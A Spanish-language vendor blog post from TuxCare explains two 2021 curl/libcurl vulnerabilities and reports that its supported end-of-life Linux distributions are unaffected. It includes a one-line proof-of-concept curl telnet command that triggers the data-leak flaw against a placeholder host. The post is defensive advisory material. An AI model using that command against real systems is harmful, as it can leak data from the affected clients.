TuxCare - Comprobación de todas las vulnerabilidades para que usted no tenga que hacerlo

Como parte de TuxCare, nos aseguramos de que todas y cada una de las nuevas vulnerabilidades sean analizadas y probadas contra todas las distribuciones y productos que soportamos. Hoy, se han revelado dos nuevas vulnerabilidades que afectan al código curl/libcurl, y como esto es algo que cubrimos con nuestro Soporte de Ciclo de Vida Extendido, ejecutamos nuestras pruebas en esta librería.

Hemos realizado numerosas pruebas y hemos descubierto que ninguno de los sistemas Linux End-of-Life que soportamos está afectado por estos fallos. Por lo tanto, puede estar seguro de que no está afectado por estas vulnerabilidades si utiliza Centos 6, Oracle Linux 6, CloudLinux 6 o Ubuntu 16, ya que están cubiertos por nuestro servicio.

Libcurl, y por extensión curl, el software de usuario que implementa la funcionalidad de libcurl, es una herramienta de transferencia de archivos que soporta múltiples protocolos. A menudo se incluye con software de terceros, aunque no se revele su presencia. Su presencia es tan ubicua que incluso ha salido del planeta y actualmente se utiliza en un vehículo explorador en Marte, donde forma parte del proceso de transferencia de datos para enviar imágenes a la Tierra. A un nivel más básico, los usuarios finales lo utilizan sin saberlo cada vez que abren una página web en un navegador o un correo electrónico en su cliente de correo preferido.

Las dos vulnerabilidades que acaban de revelarse, CVE-2021-22898 y CVE-2021-22901, afectan a libcurl de formas diferentes. La primera, de forma nada sorprendente, se descubrió en un código de hace 20 años, introducido en un cambio de código el 22 de marzo de 2001. El segundo se introdujo más recientemente, en febrero de 2021.

Echando un vistazo más de cerca a CVE-2021-22898, se trata de un fallo en la forma en que libcurl analiza la variable "CURLOPT_TELNETOPTIONS", expuesta por curl como el comando "-t". Este fallo podría ser explotado para permitir la exfiltración de datos a través de parámetros especialmente diseñados al conectarse a un servidor telnet.

Una prueba fácil de concepto de línea de comandos se parece a esto:

     curl telnet://ejemplo.com -tNEW_ENV=a,bbbbbb (256 'b's)

Actualmente no hay pruebas de la existencia de código de explotación público. Además, dado que los servidores telnet son relativamente raros hoy en día, sería bastante difícil explotarlos in the wild.

En cuanto a CVE-2021-22901, afecta a libcurl (y por extensión, a curl) cuando se compila con soporte OpenSSL (o una de sus bifurcaciones, como boringssl o libressl). Se trata de una vulnerabilidad en la forma en que libcurl reutiliza una conexión en un momento en el que, teóricamente, ya se podría haber deshecho de ella, dando lugar a una vulnerabilidad comúnmente conocida como "User After Free".

Para que esto ocurra, tiene que producirse una secuencia de eventos muy particular en el orden correcto y, de una manera sorprendentemente interesante, en lugar de que el servidor sea la parte vulnerable, en realidad es el cliente el que puede verse comprometido por un servidor malicioso.

El exploit podría ocurrir en una situación en la que libcurl está utilizando el caché de ID de sesión, reutilizándolo para múltiples peticiones, y liberando la conexión entre peticiones.

Se descubrió que ambas vulnerabilidades no afectan al código curl/libcurl actualmente desplegado para nuestros suscriptores de Extended Lifecycle. Al igual que con todas las vulnerabilidades, TuxCare continuará proporcionando pruebas y conocimientos de seguridad para garantizar que sus sistemas sean seguros.

Puede encontrar más información sobre los riesgos de utilizar una distribución Linux sin soporte técnico aquí.

 Si aún no eres suscriptor de nuestros productos, esta es una gran oportunidad para hablar con nuestros ingenieros y descubrir cómo TuxCare puede encargarse de tus tareas de administración de sistemas y mejorar tus prácticas de seguridad. Obtenga más información sobre nuestros servicios aquí.